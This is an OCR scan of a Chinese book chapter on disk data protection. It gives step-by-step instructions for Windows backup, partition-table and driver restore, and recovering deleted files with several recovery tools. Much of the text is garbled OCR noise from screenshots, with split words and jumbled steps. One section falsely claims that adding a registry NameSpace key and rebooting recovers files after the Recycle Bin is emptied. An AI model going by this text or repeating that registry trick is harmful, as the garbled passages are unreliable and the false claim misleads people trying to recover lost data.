Beveel 1 所 总 二 地 的 后 性 
a 
-= 
| _- sa 
i i ra 
六 me 
ep He 
文人 而 Ri3 录 
Ce 一 卫 [step 图 备份 完成 后 ， 将 弹出 “Windows 备 


弹出 “你 希望 多 久 备份 一 次 ”对 话 
框 ， 单 击 “ 哪 一 天 ” 右 侧 的 下 拉 按 钮 ， 在 
打开 的 下 拉 列 表 中 选择 “星期 二 ”选项 。 


| em 


你 生 记 多久 任 份 一 次 ? 


ee 


ta 


sm 二 

sw [ns 
EE 

sam: | 
[IE 
Ea 
EE 


单 击 “ 确 定 ” 按 钮 ， 返 回 到 “查看 备 
份 设置 ”对 话 框 。 


+ anse 


坦 乔 名 份 设 辕 


9 
i 


ae (0 


3 ee 
国 Dewesl pA i 


i -区 1900 Ed 


[ee] 对 


份 已 成 功 完成 ”对 话 框 。 单 击 “ 关 闭 ” 按 
钮 ， 即 可 完成 备份 操作 。 
源 Windows 备 合 -100% 充 成 一 x 


Windows 备份 已 成 功 完 成 


打开 Windows 立 性 作 征 近 市 莫 柜 音 看 设 各 


8.3 ”还 原 磁盘 各 类 数据 


在 上 一 节 学 习 了 各 类 数据 的 备份 ， 这 
样 一 旦 发 现 自己 的 磁盘 数据 丢失 ， 就 可 以 
进行 恢复 操作 了 。 


8.3.1 还 原 分 区 表 数 据 


当 计 算 机 遭 到 病毒 破坏 、 加 密 引 导 区 
或 误 分 区 等 操作 导致 硬盘 分 区 丢失 时 ， 就 
需要 还 原 分 区 表 。 这 里 以 使 用 DiskGenius 
V4.9.2.371 软 件 为 例 ， 讲 解 如 何 还 原 分 区 
表 ， 具 体 的 操作 步骤 如 下 。 
[step 图 打开 软件 DiskGenius V4.9.2.371， 
在 其 主 界 面 中 选择 “硬盘 ”一 “还 原 分 区 
表 ” 菜 单项 或 按 F10 键 。 
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Ta 


框 ， 在 其 中 选择 硬盘 分 区 表 的 备份 文件 。 


[step 贺 打开 “选择 分 区 表 备 份 文 件 ” 对 话 


Step 图 进入 “百宝箱 ”操作 界面 ， 在 其 中 单 
击 “ 驱 动 还 原 ” 图 标 。 


国 2 
in ” 。 半 六 件 二 ne 
ta EE | 

可 夺 由 re 
[ns 日 hsuw 
目 oreNote Biot 
日 邓 轩 owlook 交 从 
入 全 Tencert Fi 
小 下 BB vial Machines 
加 由 二 条 
a Windows0 (ce 
= eu DY ee 
| et 
my | Sx ofice GE 
= i 049 D0 分 Eptf 
A . 


文件 各 IN: | 本 全 分 区 末 pf “| 加 


[step 图 单 击 “ 打 开 ” 按 钮 ， 即 可 打开 “Disk 
Genius” 信 息 提 示 框 ， 提 示 用 户 是 否 从 这 
个 分 区 表 备 份 文件 还 原 分 区 表 。 


DiskGenius 


© 是 否 从 这 个 分 区 表 备 份 文件 还 原 分 区 囊 ? 还 原 后 梅 立即 保存 到 碰 盘 并 生 
效 . 


vm ED 


单 击 “是 ”按钮 ， 即 可 还 原 分 区 表 ， 
且 还 原 后 将 立即 保存 到 磁盘 并 生效 。 


温 8.3.2 ”还原 驱动 程序 数据 
前 面 介绍 了 使 用 《了 驱动 精灵 》 备 份 


驱动 程序 的 方法 ， 这 里 介绍 使 用 《驱动 精 
灵 》 还 原 驱 动 程序 的 方法 ， 具 体 的 操作 步 
又 如 下 。 

[Eee[ 在 “驱动 精灵 ”的 主 窗口 中 单 击 “ 百 
宝箱 ”按钮 。 
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| 优化 系统 服务 , 电脑 更 流畅 


灯 VE 


他 
Es 
ws 

se 


Be 图 进入 “驱动 备份 还 原 ” 界 面 ， 打 开 
“还 原 驱动 ”选项 卡 。 


step 园 在 “还 原 驱动 ”列表 中 选择 需要 还 原 
的 驱动 程序 。 


第 8 章 ”磁盘 数据 安全 的 防护 策略 二 


step 图 单 击 “一 键 还 原 ” 按 钮 ， 了 驱动 程序 开 ”8.3.3 ”还 原 磁盘 文件 数据 
始 还 原 ， 这 个 过 程 相当 于 安装 驱动 程序 的 


当 对 磁盘 文件 数据 进行 了 备份 ， 就 可 总 
以 通过 “备份 和 还 原 ” 窗 口 对 数据 进行 恢 
复 ， 具 体 的 操作 步骤 如 下 。 

[step 图 打开 “备份 和 还 原 ” 窗 口 ， 在 “ 备 


ev 份 ” 类 别 中 可 以 看 到 备份 文件 的 详细 信息 。 
四 各 党 二 本 ， 基 过 介 天 后 局 ， 茶 的 和 下 原 © 二 的 
四 : 二 备份 下 还 职 你 的 文件 四 
四 ; 
加 ， 
日 ' Family SATA AHC 0 
A ectsin : 

step 较 还 原 完成 以 后 ， 会 在 驱动 列表 的 右 侧 二 

显示 还 原 完成 的 信息 提示 。 2 me 


step 图 单 击 “还 原 我 的 文件 ”按钮 ， 弹 出 
“浏览 或 搜索 要 还 原 的 文件 和 文件 夹 的 备 


份 ” 对 话 框 。 
各 开本 文件 ” 
浏 监 或 搜 过 要 还 原 的 文件 和 文件 去 的 备份 
ee 
3 EE 
= es 半生-W06 交 人 -各 交大 入 要 析 克 和 庆 加 BL 开放 Ba 
Step| | 让 六 (| 
原 ” 工 作 界 面 显示 “还 原 完成 ， 重 启 后 生 
效 ” 的 信息 提示 ， 这 时 可 以 单 击 “ 立 即 重 
启 ” 按 钮 ， 重 新 启动 计算 机 ， 使 还 原 的 驱 me 
动 程序 生效 。 2 
| ES | ww 


晕 还 原 完 成 ， 重 启 后 生效 | 

到 Be 图 单 去 “选择 其 他 日 期 ”链接 ， 弹 出 
“还 原文 件 ” 对 话 框 ， 在 “显示 如 下 来 
源 的 备份 ”下 拉 列 表 中 选择 “上 周 ” 选 
项 ， 然 后 选择 “日 期 和 时 间 ” 组 合 框 中 的 
“2016/1/29 12.54.49” 选 项 ， 即 可 将 所 有 的 
文件 都 还 原 到 选中 日 期 和 时 间 的 版 本 ， 单 
击 “ 确 定 ” 按 钮 。 
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ett x 对 话 框 ， 可 以 看 到 选择 的 备份 文件 已 经 添 
所 文件 都 近 还 原 到 渤 行 备份 对 的 版 本 - 加 到 该 对 话 框 的 列 表 框 中 o 
时 下 来 源 的 各 份 ， 上 周 国 x 
DE 
49 济 克 或 担 过 之 丽 的 文件 和 文件 夫 的 香 份 
2016/1/29 12:54:24 ea 
me 
返回 到 “浏览 或 搜索 要 还 原 的 文件 和 
文件 夹 的 备份 ”对 话 框 。 


bai | “5 国 单 寺 “下 一 步 ”按钮 ， 弹 出 “你 想 


测 澳 节 雪 和 要 还 机 N] 文 作文 件 史 的 备份 在 何 处 还 原文 件 ? ”对 话 框 ， 在 其 中 选中 
“在 以 下 位 置 ” 单 选 按钮 。 
a RE BE Ce ee 


[Bp 图 如果 用 户 想 要 查看 备份 的 内 容 ， 可 以 
单 击 “ 浏 览 文件 ”按钮 或 “浏览 文件 夹 ” 按 
钮 ， 在 打开 的 对 话 框 中 查看 备份 的 内 容 。 这 和 
癌 6 3 监 疝 » jn > ¥ 出 4 济 了 _ 
ea en og [Sep 图 单 去 “浏览 ”按钮 ， 弹 出 “浏览 文件 
人 ” 夹 ”对 话 框 ， 选 择 文件 还 原 的 位 置 。 


上 流星 文件 的 各 从 x 
+ 小半“ 要 入 5E 语 “jv | 


浏览 文件 夫 x 


[ep 图 单 去 “添加 文件 ”按钮 ， 返 回 到 “ 浏 
览 或 搜索 要 还 原 的 文件 和 文件 天 的 备份 ” | | 
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[step 图 单 去 “确定 ”按钮 ， 返 回 到 “还 原 
文件 ”对 话 框 。 单 击 “ 还 原 ” 按 钮 ， 弹 出 
“正在 还 原文 件 …” 对 话 框 ， 系 统 开始 自 
动 还 原 备份 的 文件 。 


CE 二 可 


[Step 加 当 出 现 “ 已 还 原文 件 ” 对 话 框 时 ， 单 
击 “ 完 成 ”按钮 ， 即 可 完成 还 原 操作 。 


Ema 


已 还 民 文 伯 
i 


8.4 ”恢复 丢失 的 磁盘 数据 


当 对 磁盘 数据 没有 进行 备份 操作 ， 而 
且 又 发 现 磁盘 数据 丢失 了 ， 这 时 就 需要 借 
助 其 他 方法 或 使 用 数据 恢复 软件 进行 丢失 
数据 的 恢复 。 


8.4.1 从 回收 站 中 还 原 


当 用 户 不 小 心 将 某 一 文件 删除 ， 很 
有 可 能 只 是 将 其 删除 到 “回收 站 ”之 中 ， 
如 果 还 没有 来 得 及 清除 “回收 站 ”中 的 
文件 ， 则 可 以 将 其 从 “回收 站 ”中 还 原 出 


第 8 章 ”磁盘 数据 安全 的 防护 策略 二 


来 。 这 里 以 删除 本 地 磁盘 F 中 的 “ 美 图 ” 文 
件 夹 为 例 ， 讲 解 如 何 从 “回收 站 ”中 还 原 
删除 的 文件 ， 具 体 的 操作 步骤 如 下 。 

[step 国 双 去 桌面 上 的 “回收 站 ”图 标 ， 打 开 
“回收 站 ”窗口 ， 在 其 中 可 以 看 到 误 删 除 
的 “ 美 图 ”文件 夹 。 
a 5 了 站 


0 个 项 赎 


[step 图 右 击 该 文件 夹 ， 从 弹出 的 快捷 菜单 中 
选择 “还 原 ” 菜 单项 。 


SIR Es - 0 x 
EE 2- :==> s# «a @ 
» 


个 轩 ，Bs 站 v 怀旧 人 


a = 


[step 图 此 时 ， 即 可 发 现 文件 不 见 了 ， 说 明 已 
将 “回收 站 ”中 的 “ 美 图 ”文件 夹 还 原 到 
其 原来 的 位 置 。 
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step 国 打开 本 地 磁盘 F， 即 可 在 “本 地 磁盘 
(F:)” 窗 口中 看 到 还 原 的 “ 美 图 ”文件 夹 。 
=| 日 目 -| ea) | 


Ea = 


人 了 -个 二， HR 大 、 本 Ne 在 [F) “5 sre 用 


二 二 [a 


和 快 渤 汪 
人 oneprie 
EE 

图 am 

国画 # 

国文 站 

时 

中 于 

图 二 

全 Windows10 (C) 
= A (0) 


8 个 基 日” 谤 中 1 个 项 目 EE 


双击 “ 美 图 ”文件 夹 ， 即 可 在 打开 的 
“ 美 图 ”窗口 中 显示 出 图 片 的 缩 略图 。 


. 个 国 ， 尼 所 岳 不 地 本 二 (F) 、 壬 加 ~ © | 瑟 权 二 


升 快 访问 
他 OneDrve 


ET ojpg 0zjpg 93jpg 


浊 8.4.2 ”清空 回收 站 后 的 恢复 

当 把 回收 站 中 的 文件 清除 后 ， 用 户 
可 以 使 用 注册 表 来 恢复 清空 回收 站 后 的 文 

件 ， 有 具体 的 操作 步骤 如 下 。 

Eee 国 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 

单 中 选择 “运行 ”菜单 项 。 


搜索 (S) 


运行 (R) 


关机 或 注销 (U) 
ET 
\ 


step 图 随即 打开 “运行 ”对 话 框 ， 在 “ 打 
开 ” 文 本 框 中 输入 注册 表 命 令 regedit。 
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杏 运行 x 


FE) Windows 将 根据 你 所 边 入 的 名 称 ， 为 你 打开 相应 的 程序 
文件 夹 、 文档 或 Internet 资源 。 


打开 (O): |regedit v 


EI Be 


step 图 单 击 “ 确 定 ” 按 钮 ， 即 可 打开 “注册 
表 编 辑 器 ”窗口 。 


EE - OO x 
文件 中 六 杏 E】 本 看 (V) 区 让 天 (A】 才 (H) 
v 型 计算 由 名 称 
癌 hkey .AassEs RocT 
忆 hkey CURRENT USER 
目 pkey tocaLMAchNE 
忆 hkEy usERs 
由 nkercugsnrconnlc 


浏览 (B)… 


HNHKEY. CLASSES ROOT 


[step 园 在 窗口 的 堪 侧 展 开 “HKEY_ LOCAL 
_MACHIME\SOFTWARE\Microsoft\ 
Windows\CurrentVersion\Explorer\Desktop\ 
NameSpace 树 形 结构 。 


BB a x 


: 


< 


[RaeY LOCaLMACHINESOFTWAREWVicrorcfnWindowecurrentverionExplorenDeslaopNamespace 


[step 国 在 窗口 的 左 侧 空白 处 右 击 ， 在 弹出 
的 快捷 菜单 中 选择 “新 建 ”一 “项 ” 菜 
单项 。 

图 计 建 一 个 项 ， 并 将 其 重 命名 为 
“645FFO40-5081-101B-9F08-00AA002 
F954E”。 


第 8 章 “磁盘 数据 安全 的 防护 策略 于 


去 四 
Sw se 
- 县 
2 
re” 
a | 
WP FP) | 
三 
= 3 
ee 
RO) SM 
i 


rrETNKEY (OCAL MACHINE SOFTWARE Vier ooF Wnd ow Cementvers on Erplorer Des op Name spare 


b 

(effF90-C1EA42e A7BA-DNFS659CBA) 
(horae78 21C8-41b2 066 Boseaocsarg 
(dol95313-et4d-46u. boTe- chocnac3063) 
(e949 9397.-439e 05 4eazzczs295 


5 


[step 国 在 窗口 的 右 侧 选中 系统 默认 项 并 右 
击 ， 在 弹出 的 快捷 菜单 中 选择 “修改 ” 菜 
单项 ， 打 开 “ 编 辑 字符 串 ” 对 话 框 ， 将 
“数值 数据 ”设置 为 “回收 站 ”。 


和 x 


玉 
Ep 图 单 二 “确定 ”按钮 ， 退 出 注册 表 ， 
重新 启动 计算 机 ， 即 可 将 清空 的 文件 恢复 
出 来 。 


DEEN 


[step 图 右 击 该 文件 夹 ， 从 弹出 的 快捷 菜单 中 
选择 “还 原 ” 菜 单项 。 


有 ES 到 := 二 ss es © 


个 而 ， 辟 丫 vo 


二 Windows10 C3) 
二 He (DJ 
= ) 


] ， 


1 个 项 目 。 迁 和 1 人 日 肚 回 


[EEG 国 此 时 ， 即 可 将 “回收 站 ”中 的 “ 美 
图 ”文件 夹 还 原 到 其 原来 的 位 置 。 


=| 回国 5 Sma/F) a 口 x 
EE := := as [3 
人 vo | 机 站” 记 

2 二 从 
青 快速 廊 辣 
间 privers 
i Peritogs 
EP rogram Fles 
programData 
ma 
| 站 ToDownload 
dd Wndows 
图 昌 
人 I 
小 百 
:| 
和 Windows10(C) 
本 地 司 坦 (D3 
本 直 正 一 (E] 
一 3 人) 
加 本 地 洋 直 (HJ) 


8 个 页 日。 迹 中 1 个 顺 目 


贺电 


8.4.3 ”使 用 EasyRecovery 恢 复数 据 


EasyRecovery 是 知名 数据 恢复 公司 On- 
track 的 技术 杰作 ， 利 用 EasyRecovery 进 行 数 
据 恢复 ， 就 是 通过 EasyRecovery 将 分 布 在 硬 
盘 上 的 不 同位 置 的 文件 碎 块 找 回 来 ， 并 根 
据 统计 信息 将 这 些 文件 碎 块 进行 重 整 ， 然 
后 EasyRecovery 会 在 内 存 中 建立 一 个 虚拟 的 
文件 夹 系统 ， 并 列 出 所 有 的 目录 和 文件 。 

使 用 EasyRecovery 恢 复数 据 的 具体 操作 
步骤 如 下 。 

[step 图 双击 桌面 上 的 EasyRecovery 图 标 ， 进 
入 EasyRecovery 主 窗口 。 


157 


-AAA 
Ontrack SS 
Ea 


Professional 


[step 图 单 击 EasyRecovery 主 界面 上 的 “数据 
恢复 ”功能 项 ， 即 可 进入 软件 的 “数据 恢 
复 ” 子 系统 窗口 ， 在 其 中 显示 了 “高 级 恢 
复 ”“ 删 除 恢复 ”“ 格 式 化 恢复 ”“ 原 始 
恢复 ”等 项 目 。 


| 


格式 化 恢复 As” 原始 恢复 
3 项” 不 人 任何 文件 过 
后 内 信息 的 人 和 


国 紧急 引导 盘 
创建 类 多 引 朋 会 


志 pe Ee 


和 会计 


step 图 选择 F 盘 上 的 “图 片 .rar” 文 件 将 其 
进行 彻底 删除 ， 单 击 “ 数 据 恢复 ”功能 项 
中 的 “删除 恢复 ”按钮 ， 即 可 开始 扫描 


系统 。 
正在 扫描 系统 … 


step 园 在 扫描 结束 后 ， 将 会 弹出 “目的 地 警 
告 ” 提示 框 ， 建 议 用户 将 文件 复制 到 不 与 
恢复 来 源 相 同 的 一 个 安全 位 置 。 


Se 


[a 1 得 博时 


厂 不 再 显示 该 消息 


ma | 
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[step 图 单 去 “确定 ”按钮 ， 将 会 自动 弹出 
如 下 图 所 示 的 对 话 框 ， 提 示 用 户 选择 一 个 
要 恢复 删除 文件 的 分 区 ， 这 里 选择 F 盘 。 在 

“文件 过 滤器 ”中 进行 相应 的 选择 ， 如 果 
误 删 除 的 是 图 片 ， 则 在 “文件 过 滤器 ”中 
选择 “图 像 文 档 ” 选 项。 但 若 用 户 要 恢复 
的 文件 是 不 同类 型 的 ， 可 直接 选择 “所 有 
文件 ”， 再 选中 “完全 扫描 ”选项 。 


“ 独 | 电 夏 ” 工具 本 让 你 访问 已 有 899S 件 。 何 本 以 执行 快 
人 


| EH WINE BAF" ,NA E 
与 关 昔 扫 莉 
傅 只 下 ，“ 刚 | 收复” 工具 竺 执行 分 区 的 二 速 扫 拓 ， 使 用 融 
人 二 注 PM4A 季 和 亲人。 更 人 人 ENYA 
3 扩 


Rei 


单 击 “ 下 一 步 ”按钮 ， 软 件 开始 扫描 
选 定 的 磁盘 ， 并 显示 扫描 进度 ， 如 已 用 时 
间 、 剩 余 时 间 、 找 到 目录 和 找到 文件 等 。 


= 正在 处 理 区 块 : 2450 / 2823 
已 用 时 间 ; 3 秒 


上 次 文件 ，x66_mi crosoft-windows-setup-dependencies_31bf3958 


Ee 


[Step 图 在 扫描 完毕 后 ， 将 扫描 到 的 相关 文件 
及 资料 在 对 话 框 左 侧 以 树 状 目录 列 出 来 ， 
右 侧 则 显示 具体 删除 的 文件 信息 。 在 其 中 
选择 要 恢复 的 文档 或 文件 夹 ， 这 里 选择 
“图 片 .rar” 文 件 。 

PF ERecorem < 


Prefeaeional 


关中 你 明天 怕 身 的 文 忻 , 连 择 “下 一 步 ”大 儿 到 “目的 地 选择 ” 屏 。 活 绎 “后 刘 ” 返回 到 “分 区 连 
和 屏 每 ， 兴 笃 “开车 ” 衣 出 工 忆 . 


话 框 中 设置 恢复 数据 的 保存 路 径 。 
EE SRecovery- 一 


你 矿 目 的 地 选项 
ES [ 四 
高 有 


策 
三 生成 要 报 和 
| 


人 un ez ess 
step 图 单 去 “浏览 ”按钮 ， 打 开 “ 浏 览 文 件 
夹 ” 对 话 框 ， 在 其 中 选择 恢复 数据 保存 的 
位 置 。 


济 文 件 冯 


中 


同 图 片 
国文 人 
时 
小 醒 乐 
国 点 西 
和 Windowslo (cy 


单 击 “确定 ”按钮 ， 返 回 到 设置 恢复 
数据 的 保存 路 径 。 


Sn Sm a 
step 国 单 击 “ 下 一 步 ” 按 钮 ， 软 件 自动 将 文 


step 图 单 去 “下 一 步 ” 按 钮 ， 可 在 弹出 的 对 
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件 恢复 到 指定 的 位 置 。 


已 恢复 1 / 1 个 文件 
已 恢复 2. 94 MB / 4.811B 


[step 图 在 完成 文件 恢复 操作 后 ，EasyRecovery 
将 会 弹出 一 个 恢复 完成 的 提示 信息 窗口 ， 
在 其 中 显示 了 数据 恢复 的 详细 内 容 ， 和 包括 
源 分 区 、 文 件 大 小 、 已 存储 数据 的 位 置 等 


内 容 。 


的 ” 愤 租 ,可 造 泽 “元 或- 名 出 工具 ,， 


院 收 
Ce) 2000-2005 Iroll Datrask In: 
HR 洛 避 建 于 10/15f2015 9 2:04 灿 


潭 并 动 器 wnc YD50 rnAAS-0ns980 


ep 图 单 击 “ 完 成 ”按钮 ,打开 “保存 恢 
复 ” 对 话 框 。 单 击 “ 否 ”按钮 ， 即 可 完成 
恢复 ， 如 果 还 有 其 他 的 文件 要 恢复 ， 则 可 
以 单 击 “ 是 ”按钮 。 


您 是 否 要 保存 恢复 状态 以 便 在 今后 继续 ? 


8.4.4 使 用 FinalRecovery 恢 复数 据 


FinalRecovery 是 一 个 功能 强大 且 非 常 加 
容易 使 用 的 数据 恢复 工具 ， 它 可 以 帮助 用 
户 快速 找 回 丢失 的 文件 或 者 文件 夹 。 

这 里 以 恢复 丢失 的 本 地 磁盘 F: 中 的 
“ 美 图 .rar” 文 件 为 例 ， 具 体 的 操作 步骤 
如 下 。 

[step 回 在 FinalRecovery 程 序 主 窗口 中 选中 右 
侧 窗 格 中 丢失 文件 所 在 的 驱动 磁盘 ， 这 里 
选择 本 地 磁盘 F:。 
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FiralRecoven/ 30 -IDEMOI =- oOo x 
He View Tools Hap 


入 san 图 Rem 仿 op | 区 Rarecoer | 国 DrieImage -sh 加 up 本 Hap 
My Computer 
2 Windowr0 cl 
四 
2 
加 .| 
> Sa sr [Ta [一 
bend, Rd 
mAn 


My Cor Curene 6 engies 


[see 图 单 去 工具 栏 中 的 Scan 按钮 ， 打 开 
Select Scan Mode 对 话 框 ， 系 统 为 用 户 提供 
了 三 种 扫描 模式 ， 包 括 Standard Scan〔 标 
准 扫 描 ) 、Advanced Scan (高 级 扫描 ) 及 
Scan for Partitions (扫描 整个 分 区 ) 。 


Select Scan Mode x 


Standard Scan: 
Fast and powerful scan method. Most deleted files 
and folders can be found by using this method. 


Advanced Scan: 
Recover fles from formatied volumes deleted/lost 
partitions. "Advanced Scan" is also the precondition 
of "Raw Recovery’. 

Scan for Partitions: 

Scan drive to discover lost partitions, and then 
“Standard Scan and "Advanced Scan” can be applied 
to found partitions. 


[Cee 


step 国 单 击 Standard Scan 按钮 ， 即 可 开始 对 
F 盘 执行 标准 扫描 ， 扫 描 完成 后 ， 其 扫描 结 
果 显 示 在 窗口 右 侧 的 窗 格 中 。 


Finallecorery 20 - DEMO - oOo x 


2017.0 
2017-01-03 17312 
a 


FE 


step 图 在 其 中 选择 已 经 删除 的 “ 美 图 .rar” 
文件 ， 单 击 工具 栏 中 的 Recover 按 钮 ， 打 开 


Tatal S0006 resers 
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“打开 ”对 话 框 ， 在 其 中 选择 恢复 文件 的 
保存 位 置 ， 这 里 选择 本 地 磁盘 D:。 


[ “| Gp 
2 
2016-07-01 1026 
2016.07.08124 
2017.0103 1308 
2016.07.05 1238 
201610051122 
am6oo-1a 120 
2016-08-19 1050 
2017-01-02 13n6 
2016-10-05 17.01 
2016-10-05 1725 
2016.07-05 1810 


取消 


单 去 “确定 ”按钮 ， 即 可 开始 恢复 
“ 美 图 rar” 文件 ， 并 显示 恢复 文件 的 个 数 。 


Recovery Summary x 


Processed Fles: 1 
Recovered Files: 1 


Failed Fles 0 Show Details 


Close 


打开 本 地 磁盘 D:， 即 可 在 其 窗口 中 看 
到 恢复 后 的 “美国 rar” 压缩 文件 。 


8.4.5 ”使 用 FinalData 恢 复数 据 


使 用 FinalData 能 够 通过 直接 扫描 目标 
磁盘 ， 抽 取 并 恢复 出 文件 信息 〈 包 括 文件 
名 、 文 件 类 型 、 原 始 位 置 、 创 建 日 期 、 删 除 
日 期 、 文 件 长 度 等 ) ， 用 户 可 以 根据 这 些 信 
息 方 便 地 查找 和 恢复 自己 需要 的 文件 。 

这 里 以 本 地 磁盘 F 盘 中 丢失 的 “ 美 
图 .rar” 文 件 为 例 介 绍 FinalData 恢 复数 据 的 
方法 。 


1. 安装 FinalData 软 件 
[step 图 双击 下 载 的 FinalData 安 装 程序 ， 打 开 
“欢迎 使 用 “FINALDATA” 安 装 向 导 ” 对 
话 框 ， 单 击 “ 下 一 步 ” 按 钮 。 


医 FINALDATA 安装 = x 


欢迎 使 用 “FINALDATA” 安 装 向 导 


这 个 向 导 将 指引 你 完成 “FTIALDATA” 的 去 装 进程 
en 


单 击 [下 一 步 切 ] 继续 。 


数据 恢 备 su 


取消 (5) 
step 图 进入 “选择 安装 位 置 ” 对 话 框 ， 在 
其 中 输入 文件 的 安装 位 置 ， 单 击 “ 安 装 ” 
按钮 。 


| 葬 FINALDATA 安 妆 = D Xx| 


选择 安装 位 置 
选择 "FINALIATA" 的 安装 文件 来 。 


pn 


为 提 训 执 据 蛋 质 成 功率 ， 请 不 要 将 本 软件 完 法 3 需要 惰 四 廊 件 的 亚 盘 中 。 


3 


"ee 
目标 文件 夹 
[5 \ 归 所 几 页 ViDasspesovery 
所 规 空间 :4.2 
可 用 空间 ;26.968 
ETINLDMA 
TE- RD | | WA 


[step 图 进入 “正在 完成 “FINALDATA” 安 
装 向 导 ” 对 话 框 ， 勾 选 “ 运 行 FINALDATA 
(R) ” 复 选 框 ， 单 击 “ 完 成 ”按钮 。 

且 FINALDATA 安装 


正在 完成 “FINALDATA” 安 装 向 导 


的 


回 运行 FENAIDATACR) 


数 摔 号 量 B 


EE 最 靖 i) 


2. 使 用 FinalData 恢 复 “ 美 图 .rar” 数据 
[step 回 双 去 FinalData 程 序 图 标 ， 打 开 FinalData 


第 8 章 ”磁盘 数据 安全 的 防护 策略 二 于 


操作 界面 。 


FinalData 


DATA RECOVERY 


蝎 买 注册 


加 醒 用 教 到 。“ 国 用 户 评 价 


请 选择 您 加 利 的 问题 《 饼 慰 留 在 功能 按钮 可 坦 看 详情 ) 


EG 


step 图 单 击 “ 误 删除 文件 ”图 标 ， 进 入 “请 
选择 要 恢复 的 文件 和 目录 所 在 的 位 置 ” 对 
话 框 ， 在 其 中 选择 “本 地 磁盘 (F:)”。 


FinalData 


DATARECOVERY 


购买 注册 


全 全 政和 。“ 国 用 户 评价 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “查找 
已 经 删除 的 文件 ”对 话 框 ， 程 序 开始 对 F 盘 
进行 快速 扫描 ， 以 查找 F 盘 内 删除 的 目录 和 
文件 。 


购 忱 注册 
加 使 用 教程 。“ 国 用 户 评价 
吉本 已经 收 $ 的 文件 
EE 本 文件 , 这 缚 位 
Crm 


3 拉杆: 


了 WerswisiaistrstaWaynuesttosaltreogtoeqie opted al 


step 贺 在 程序 扫描 完成 后 ， 自 动弹 出 “ 扫 
描 结 果 ” 对 话 框 ， 在 其 中 匀 选 要 恢复 的 文 
件 ， 这 里 义 选 “ 美 图 Tar” 前 面 的 复 选 框 。 
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[了 


FinalData 
DATARECOVERY 
扫 科 结果 
最 后 im 未 随 一 二， 六 型 才 博 了 大 上 和 
大 小 Ri 月 


(CET 


司 x# 名 | 


ESE] 3] 


中 口 国 atompahs 


| 回 量 Er 251KB 207131917- 2007131917- 2017.131317- 


ET 


复 路 径 ” 对 话 框 ， 在 其 中 输入 恢复 文件 存 
放 的 目录 。 


四 


选择 恢复 路 径 


FinalData i 


DATA RECOVERY 后 使 用 梳 和 【合用 下 评价 


请 过 皇 一 二 昌 录 存 让 人 页 的 六 全 > 
TD 


如 果 ! 盘 有 文件 要 愧 夏 ， 清 中 过 择 昌 录 存 永昌 六 纺 诡 件 。 
汉代 和 
突 位 大小 和 计 ;86151 加 


[Sep 国 单 去 “浏览 ”按钮 ， 打 开 “ 浏 览 文件 
夹 ” 对 话 框 ， 在 其 中 选择 恢复 文件 保存 的 
gms 国 位 置 。 


浏览 文件 闪 x 


》 二 Windows10 (Cy ^ 


> © AAPasswordRecovery 
半 adobe acrobat pro9 
> “| AdobeAcrobatpro lite 
> adobereader 9 
> apdfprentcn_ gr v 


文 二 [和 呈 


cc 四 二 


162 


step 园 单 去 “确定 ”按钮 ， 返 回 到 “选择 恢 
复 路 径 ” 对 话 框 。 


购买 注册 


FinalData 


DATA RECOVERY 


加 


回合 用 攻 笠 。“@@ 用 户 评价 


如 条 3 凶 有 六 件 大 要 人 技 ， 有 外 选择 上 好 让 示 订 砚 上 末 8 全 
和 
并 2 


step 图 单 直 “下 一 步 ” 按 钮 ， 即 可 开始 恢复 
数据 。 完 成 数据 恢复 后 ， 返 回 存放 路 径 ， 


即 可 查看 恢复 后 的 文件 。 
| 回 四 ，| ze 人 Hi oo x 
Er :> == © 
< 个 二， 所 » 4) ve 
3 xn 
i rorkeyd ozs6 
屋 OneDrive 蛋 skeyd.57480) 
AdobeAcrobetpro le 

EP 

EE 

加 到 4 是 cicbeeeve 

用 并 spdfprerten gr 

i 忻 acormmy 

二 nds 

sr 

和 windoweio cy 

ao 

~ ee 司 webDAvscon wecbAv 且 FE 

站 pe 

— Ta re 


8.4.6 ”使 用 《DataExplore 数 据 恢复 大 
师 》 恢 复数 据 


《DataExplore 数 据 恢复 大 师 》 是 一 款 
功能 强大 、 提 供 了 较 低 层次 恢复 功能 的 硬 
盘 数 据 恢 复 软 件 ， 支 持 FAT12、FAT16、 
FAT32、NTFS 文 件 系 统 ， 可 以 导出 文件 
夹 ， 能 够 找 出 被 删除 、 快 速 格式 化 、 完 全 
格式 化 、 删 除 分 区 、 分 区 表 被 破坏 或 者 
Ghost 破坏 后 的 硬盘 文件 。 


1. 恢复 已 删除 的 文件 
step 国 在 “DataExplore 数 据 恢 复 大 师 ” 主 
窗口 中 单 击 “数据 ”按钮 ， 打 开 “ 选 择 数 
据 ” 窗口 。 


| 运 尝 数 二 x 
上 
re Re 
梧 直 化 的 由 ip 将 于 法 二 村 rr 器 区 局 
村 QFs 122.015) = 
3 9 i Ors 00) 


Ghost 的 慨 收 


[wane] IX ™ |] 


step 图 选择 左 侧 的 “删除 的 恢复 ”选项 ， 在 
右 侧 窗 格 中 选择 所 需 恢 复 的 分 区 。 


[es [nindonatol MFS 100.015) 
ms paom 


| | or aazolg 
EE 寺 em 
chont 的 加 


em] 


[step 图 单 直 “确定 ”按钮 ， 系 统 开 始 扫描 丢 
失 的 数据 ， 在 完成 数据 的 扫描 和 查找 后 ， 
所 查找 到 的 文件 将 会 显示 在 文件 夹 视图 和 
列表 视图 中 。 


Deport x 
交 御 加 ”视图 (0 功 就 (1 下 看 全 硬 口 妇 ”于 助 加 
上 开国 站 六 二 和 


pe li 


ee 
et 


ES 


[step 图 在 “列表 视图 ” 窗 格 中 选中 需要 恢复 
的 数据 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 
i 菜单 项 。 


Dato Evplore 台 虹 信 生 大 用 V2 53 -洗澡 营 尖 呈 科 村 有 限 公司 - 二 0 x 
琶 御 [E) ”视图 人 Y) 功能 何 | 得 看 人 而 口 (wD 届 动 [了 D 
加 和 总 名 轴 Pe 
向 上 宣 羔 排尿 于 天 和 直下 这 了 
[2 
件 交 | 
EF 
Dv NS Pan6 a 114 
已 sas 


[cE 
加 这 中 全 部 文 伯 


es ' 


| 


A 3 


划 出 性 
到 出访 列表 


| 时 DatnExplore 直 和 大 了 V2.53 “上 光村 避 时 村 有 隐 公 司 …-- =- 是， 基 
| 交 位 人 视图 人 0 功 兹 了) 亚 痢 人 而 口 [WD 于 失信 


局 息 碟 器 昌 | 总 轩 名 三 饲 委 志 


二 


Er 
已 天 的 文件 

9 WR 

文件 


